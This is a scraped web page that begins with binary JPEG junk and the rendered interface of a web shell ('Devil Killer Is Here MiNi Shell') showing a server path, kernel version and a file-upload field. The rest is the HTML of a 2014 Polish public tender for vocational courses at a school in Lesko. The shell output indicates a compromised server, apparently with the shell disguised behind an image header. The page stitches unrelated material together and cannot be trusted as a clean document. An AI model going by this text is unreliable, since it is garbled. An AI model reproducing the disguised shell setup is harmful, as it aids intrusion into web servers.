JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140826/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140826/283218-N-2014.html

<p class="kh_header"><b>Lesko: organizacja kursów zawodowych dla uczniów Zespołu Szkół Technicznych i Artystycznych w Lesku</b><br>
<b>Numer ogłoszenia: 283218 - 2014; data zamieszczenia: 26.08.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zespół Szkół Technicznych i Artystycznych w Lesku , al. Jana Pawła II 18 a, 38-600 Lesko, woj. podkarpackie, tel. 13 4696673, faks 13 4696673.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zstia.lesko.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: szkoła średnia.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> organizacja kursów zawodowych dla uczniów Zespołu Szkół Technicznych i Artystycznych w Lesku.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest usługa polegająca na organizacji kursów zawodowych dla uczniów Zespołu Szkół Technicznych i Artystycznych w Lesku.
Zamówienie dzieli się na 7 części:
Część 1. Organizacja kursu prawa jazdy kat. B 
Część 2. Organizacja marketingowego szkolenia recepcjonistów oraz pracowników gastronomii 
Część 3. Organizacja kursu wykorzystania grafiki komputerowej w marketingu
Część 4. Organizacja kursu uzyskiwania energii wiatru
Część 5. Organizacja kursu odzyskiwania energii geotermalnej
Część 6. Organizacja kursu pozyskiwania energii z biomasy i biopaliw
Część 7. Organizacja kursu elektryk.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 7.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca zobowiązany jest spełniać warunki wymienione w art. 22 ust. 1 ustawy z dnia 29.01.2004 r. Prawo zamówień publicznych. Spełnianie powyższych warunków będzie oceniane na podstawie złożenia wymaganego w SIWZ i ogłoszeniu o zamówieniu oświadczenia o spełnianiu warunków udziału w postępowaniu. Złożenie oświadczenia zgodnie z wymaganiami SIWZ oraz ogłoszenia o zamówieniu, będzie potwierdzeniem spełniania wymaganych warunków</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca zobowiązany jest spełniać warunki wymienione w art. 22 ust. 1 ustawy z dnia 29.01.2004 r. Prawo zamówień publicznych. Spełnianie powyższych warunków będzie oceniane na podstawie złożenia wymaganego w SIWZ i ogłoszeniu o zamówieniu oświadczenia o spełnianiu warunków udziału w postępowaniu oraz na podstawie załącznika nr 4 do SIWZ - wykaz zrealizowanych usług. Wykonawca powinien posiadać doświadczenie tj wykonać co najmniej 1 usługę polegającą na przeprowadzeniu kursu, formy kształcenia o treści zbliżonej do zakresu tematycznego zamówienia wskazanego w części 1,2,3,4,5,6,7.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca zobowiązany jest spełniać warunki wymienione w art. 22 ust. 1 ustawy z dnia 29.01.2004 r. Prawo zamówień publicznych. Wykonawca powinien dysponować zapleczem technicznym do prowadzenia zajęć praktycznych w ramach części zamówienia nr 2. Wykonawca powinien dysponować minimum 3 hotelami o standardzie minimum 3 gwiazdkowym - każdy na inną grupę zajęciową, w tym samym czasie. Spełnianie powyższych warunków będzie oceniane na podstawie złożenia wymaganego w SIWZ i ogłoszeniu o zamówieniu oświadczenia o spełnianiu warunków udziału w postępowaniu oraz na podstawie zobowiązań do oddania do dyspozycji hotelu w zakresie i wymiarze niezbędnym do prowadzenia zajęć - zał. nr 5 do SIWZ. Załączniki nr 5 składają jedynie wykonawcy którzy składają ofertę na część 2 zamówienia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca zobowiązany jest spełniać warunki wymienione w art. 22 ust. 1 ustawy z dnia 29.01.2004 r. Prawo zamówień publicznych. Spełnianie powyższych warunków będzie oceniane na podstawie złożenia wymaganego w SIWZ i ogłoszeniu o zamówieniu oświadczenia o spełnianiu warunków udziału w postępowaniu. Złożenie oświadczenia zgodnie z wymaganiami SIWZ oraz ogłoszenia o zamówieniu, będzie potwierdzeniem spełniania wymaganych warunków - zał nr 2 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca zobowiązany jest spełniać warunki wymienione w art. 22 ust. 1 ustawy z dnia 29.01.2004 r. Prawo zamówień publicznych. Spełnianie powyższych warunków będzie oceniane na podstawie złożenia wymaganego w SIWZ i ogłoszeniu o zamówieniu oświadczenia o spełnianiu warunków udziału w postępowaniu. Złożenie oświadczenia zgodnie z wymaganiami SIWZ oraz ogłoszenia o zamówieniu, będzie potwierdzeniem spełniania wymaganych warunków - zał. nr 2 do SIWZ.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>zobowiązanie do oddania do dyspozycji hotelu w zakresie i wymiarze niezbędnym do prowadzenia zajęć - zał. nr 5 do SIWZ.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>W szczególnie uzasadnionych przypadkach dopuszcza się zmiany postanowień umowy, w związku z wystąpieniem okoliczności, których nie można było przewidzieć w chwili wyboru najkorzystniejszej oferty lub zmiany te są korzystne dla Zamawiającego a Wykonawca wyrazi na nie zgodę. Zamawiający przewiduje możliwość zmiany umowy w zakresie zmiany terminów i zakresu realizacji usługi oraz terminów płatności w przypadku konieczności dokonania zmiany wynikającej z realizacji projektu oraz w przypadku zaistnienia wyjątkowych okoliczności zarówno po stronie Wykonawcy jak i Zamawiającego.
W przypadku zmiany stawki podatku VAT, zostanie on naliczony zgodnie  z obowiązującymi przepisami.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zstia.lesko.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zespół Szkół Technicznych i Artystycznych w Lesku
Al. Jana Pawła II 18A, sekretariat.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 03.09.2014 godzina 15:30, miejsce: Zespół Szkół Technicznych i Artystycznych w Lesku
Al. Jana Pawła II 18A, sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Organizacja kursów zawodowych dla uczniów ZSTiA w Lesku w ramach projektu pt.: Podkarpacie stawia na zawodowców współfinansowanego przez Unię Europejską ze środków Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki, działanie 9.2..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Organizacja kursu prawa jazdy kat. B.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia.
Przedmiotem zamówienia jest zorganizowanie i przeprowadzenie kursu prawa jazdy kat. B teoria i praktyka dla 20 uczniów Zespołu Szkół Technicznych i Artystycznych w Lesku uczestniczących projekcie pt Podkarpacie stawia na zawodowców współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego. Program Operacyjny Kapitał Ludzki Priorytet IX, Działanie 9.2.
2.1.1. Minimalne wymagania realizacji Przedmiotu zamówienia:
Wymiar 60 godzin -30 godzin szkoleniowych teoretycznych -30 godzin szkoleniowych praktycznych dla każdego uczestnika w miejscu ustalonym z Zamawiającym w dni: od poniedziałku do soboty w terminach ustalonych z Zamawiającym w wymiarze nie większym niż 5 godzin dziennie. Kurs podzielony będzie na 2 edycje: 1 grupa 10 osobowa od podpisania umowy do końca 2014 r.i 1 grupa 10 osobowa w okresie od 01.01.2015r. do 30.05.2015r. 
Program kursu musi być zgodny z przepisami Rozporządzenia Ministra Infrastruktury z dnia 27 października 2005 r. w sprawie szkolenia, egzaminowania i uzyskiwania uprawnień przez kierujących pojazdami, instruktorów i egzaminatorów oraz Rozporządzeniem ministra infrastruktury z 8 maja 2009 r. zmieniające rozporządzenie w sprawie szkolenia, egzaminowania i uzyskiwania uprawnień przez kierujących pojazdami, instruktorów i egzaminatorów Dz. U. 2009 nr 78 poz. 653.
2.1.2.W ramach realizacji przedmiotu zamówienia Wykonawca jest zobowiązany do: 
1 Uzgodnienia z Zamawiającym harmonogramu ramowego rozkładu zajęć i przedłożenia go Zamawiającemu przy podpisaniu umowy,
2 Przekazania każdemu uczestnikowi 1 kompletu materiałów szkoleniowych oraz 1 egzemplarza lub ksero-kopii - Zamawiającemu,
3 Realizacji przedmiotu zamówienia w formie wykładów, pokazów oraz ćwiczeń i zadań praktycznych kształtujących i doskonalących nabyte umiejętności,
4 Zapewnienia materiałów dydaktycznych niezbędnych do przeprowadzenia szkolenia,
5 Zapewnienia wykładowców, instruktorów 
6 Zapewnienia min. 2 instruktorów do części praktycznej, 
7 Zapewnienia sprzętu niezbędnego do należytej realizacji przedmiotu zamówienia spełniającego wymogi prawne w zakresie BHP i p.poż. oraz zapewnienia sali, placu manewrowego odpowiednio przystosowanego do przeprowadzenia zajęć oraz samochodów .
8 Prowadzenie dziennika zajęć, list obecności,
9 Bieżącego informowania Zamawiającego o przypadkach nieobecności uczestników na zajęciach,
10 Wydania oryginałów i kserokopii zaświadczeń, certyfikatów ukończenia kursu w
terminie 7 dni od zakończenia realizacji przedmiotu zamówienia
11 Ubezpieczenia uczestnika od następstw nieszczęśliwych wypadków powstałych w związku z uczestnictwem w zajęciach
12 Ponoszenia wszelkich kosztów niezbędnych w celu prawidłowej realizacji przedmiotu zamówienia, nie-przewidzianych w umowie, 
13 Przeprowadzenia teoretycznego egzaminu wewnętrznego,
14 Opłaty za pierwszy pełny egzamin państwowy,
15 Złożenia Zamawiającemu w terminie 7 dni po zakończeniu realizacji przedmiotu zamówienia: dziennika zajęć, kompletu list obecności, potwierdzenia odbioru materiałów szkoleniowych, egzemplarza materiałów szkoleniowych lub kserokopii, zaświadczeń, certyfikatów ukończenia kursu, kserokopii  zaświadczeń, certyfikatów, kserokopii ubezpieczenia NNW..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.05.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Organizacja marketingowego szkolenia recepcjonistów oraz pracowników gastronomii.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 2.2. Przedmiot zamówienia.
Organizacja marketingowego szkolenia recepcjonistów oraz pracowników gastronomii.
2.2.1. Okres realizacji kursu: Działanie realizowane będzie od dnia podpisania umowy do 31.12.2014r.
2.2.2. Uczestnicy kursu: 15 osób (3 grupy 5 osobowe).
2.2.3. Wymiar czasowy kursu: 180h w tym 60h zajęć praktycznych, 1h = 45 minut. Zajęcia powinny się od-bywać w dni: od poniedziałku do piątku w terminach ustalonych z Zamawiającym w wymiarze nie większym niż 6 godzin dziennie
2.2.4. Miejsce realizacji kursu: Miasto Lesko (120h) oraz Miasto Kraków (60h). Zajęcia w Krakowie powinny odbywać się w hotelach o standardzie minimum 3 gwiazdek, w 3 grupach 5 osobowych, każda w innym hotelu.
2.2.5. Zakres tematyczny kursu powinien obejmować minimum:
1 Doskonałość w obsłudze gościa - personel recepcji w tym: 
 Savoir-vivre - estetyczny wymiar hotelarstwa 
 Inteligencja emocjonalna w obsłudze Klienta 
2  Techniki sprzedaży dla recepcjonistów 
 Techniki dobrego sprzedawcy - czyli o sile nawyku i liczbach każdego sprzedawcy 
 Przebieg rozmowy handlowej i podstawowe zasady autoprezentacji 
3 Nowoczesny marketing w hotelarstwie: 
Marketing tradycyjny a Marketing nowoczesny - trendy 
Znaczenie marki w dobie kryzysu - DNA marki hotelu
4 Zajęcia praktyczne (60h):  Menager w gastronomii. Zarządzanie firmą gastronomiczną, w najbardziej efek-tywny i zyskowny sposób w celu objęcia stanowiska: manager restauracji. Podczas szkolenia uczestnicy będą poznawać aplikacje, producenta oprogramowania dla gastronomii. Uczestnicy szkolenia zapoznają się z systemem zarządzania gospodarką magazynową lokalu, jak również programem służącym do sprzedaży barmańsko-kelnerskiej.
Zajęcia powinny się odbywać w Krakowie, w minimum 3 hotelach o standardzie minimum 3 gwiazdek. 
2.2.5. W ramach realizacji przedmiotu zamówienia Wykonawca jest zobowiązany do: 
1 Uzgodnienia z Zamawiającym harmonogramu zajęć oraz programu zajęć i przedłożenia go Zamawiającemu przy podpisaniu umowy. 
2 Przekazania każdemu uczestnikowi 1 kompletu materiałów szkoleniowych oraz 1 egzemplarza lub ksero-kopii - Zamawiającemu,
3 Realizacji przedmiotu zamówienia w formie wykładów, pokazów oraz ćwiczeń i zadań praktycznych kształ-tujących i doskonalących nabyte umiejętności
4 Zapewnienia wykładowców
5 Zapewnienia miejsca odbywania zajęć praktycznych w minimum 3 hotelach o standardzie minimum 3 gwiazdek zlokalizowanych na terenie Miasta Krakowa, w wymiarze 90h (po 30h grupę/hotel)
6 Zapewnienia niezbędnego sprzętu i wyposażenia do prowadzenia zajęć teoretycznych i praktycznych
7 Zapewnienie transportu uczestników kursu z Leska do miejsca odbywania zajęć praktycznych i z powrotem a także z miejsca zakwaterowania do miejsca zajęć praktycznych
8 Zapewnienia noclegu uczestnikom kursu w Krakowie w wymiarze minimum 5 dób hotelowych/uczestnika kursu, w pokojach 2 lub 3 osobowych.
9 Zapewnienia wyżywienia uczestników kursu w trakcie pobytu w Krakowie. Wyżywienie obejmuje okres mi-nimum 5 dób pobytu w miejscu zakwaterowania -śniadanie szwedzki stół, obiad 2 daniowy, kolacja szwedzki stół oraz suchy prowiant na przejazd do i z Krakowa.
10 Zapewnienia 3 opiekunów uczestników wyjazdu na zajęcia praktyczne w Krakowie - po 1 opiekunie na 5 osób
11 Prowadzenie dziennika zajęć, list obecności,
12 Bieżącego informowania Zamawiającego o przypadkach nieobecności uczestników na zajęciach,
13 Wydania oryginałów i kserokopii zaświadczeń, certyfikatów ukończenia kursu w
terminie 7 dni od zakończenia realizacji przedmiotu zamówienia,
14 Ubezpieczenia uczestnika od następstw nieszczęśliwych wypadków powstałych w związku z uczestnic-twem w zajęciach,
15 Ponoszenia wszelkich kosztów niezbędnych w celu prawidłowej realizacji przedmiotu zamówienia, nie-przewidzianych w umowie, 
16 Złożenia Zamawiającemu w terminie 7 dni po zakończeniu realizacji przedmiotu zamówienia: dziennika zajęć, kompletu list obecności, potwierdzenia odbioru materiałów szkoleniowych, egzemplarza materiałów szkoleniowych,  kserokopii zaświadczeń, certyfikatów ukończenia kursu, kserokopii ubezpieczenia NNW, dokumentacji zdjęciowej i filmowej prowadzonych zajęć w Lesku i Krakowie.
Zamawiający zastrzega sobie możliwość oddelegowania obserwatora zajęć w Krakowie. Koszt obserwatora ponosi Zamawiający..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Organizacja kursu wykorzystania grafiki komputerowej w marketingu.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 2.3. Przedmiot zamówienia.
Organizacja kursu wykorzystania grafiki komputerowej w marketingu
2.3.1. Okres realizacji kursu: od dnia podpisania umowy do 31.12.2014r.
2.3.2. Uczestnicy kursu: 1 grupa - minimum 15 osób maksimum 30 osób, uczniowie ZSTiA oraz uczniowie francuscy
2.3.3. Wymiar czasowy kursu: 80h, 50h teoria i 30h zajęcia praktyczne, 1h = 45 minut.
2.3.4. Miejsce realizacji kursu: Miasto Lesko (ZSTiA)
2.3.5. Kurs powinien być prowadzony w języku angielskim.
Kurs przygotowuje do prowadzenia działalności gospodarczej związanej z zarządzaniem design-em oraz problematyką brauning-u w branży kreatywnej (HOTELARSKIEJ). Wprowadzenie do grafiki projektowej i design-u współczesnego wzornictwa graficznego, instrumentów zintegrowanej komunikacji marketingowej, podstaw marketingu i psychologii reklamy, CONTENT MARKETING
Warsztaty komputerowe - multimedia i elementy grafiki. Elementy kreacji plastycznej, grafika projektowa, podstawy fotografii, podstawy projektowania i zarządzania stronami internetowymi.
Zakres tematyczny kursu:
Część teoretyczna: 50h
Strategia konkurowania na rynku, w tym kwestii związanych z rozwojem i wzrostem branding-u w obecnych warunkach rynkowych, znaczenie storytellingu w budowaniu marki hotelu.
Ekonomiczna wizja strony designu i jego wpływu na sukces biznesowy hotelu,
Stosowanie skutecznego designu dla osiągnięcia przewagi konkurencyjnej w hotelarstwie.
Strategie konkurowania hoteli na rynku. 
Design - sztuka czy marketing, wprowadzanie hotelu na rynek reklamy.
Akcja reklamowa - advertising, promotional campaign.
Sztuka prezentacji w biznesie hotelarskim, jak pokazać się z lepszej strony.
Zarządzanie marką, budowanie świadomości Brandingu świadomości natychmiastowej top-of-mind. Top-of mind wskazuje, która marka kategorii hoteli lub usług jest pierwszą rozważaną marką w momencie decyzji o zakupie, wysoka wartość top-of-mind decyduje o wyborze hotelu.
spontaniczna świadomość marki (spontaneous brand awareness) pokazanie pola wyboru klienta. Polem tym jest zwykle kilka marek (3-6), które dla konsumenta maja największe znaczenie pod-czas dokonywania wyboru spośród całej kategorii produktowej. Do pola tego należy również marka top-of-mind.
Kreowanie hasła reklamowego - Hasło reklamowe - wyróżnik marki, zarządzanie komunikacja werbalną.
narzędzia wspomagające projektowanie (typu MOCK-UP) 
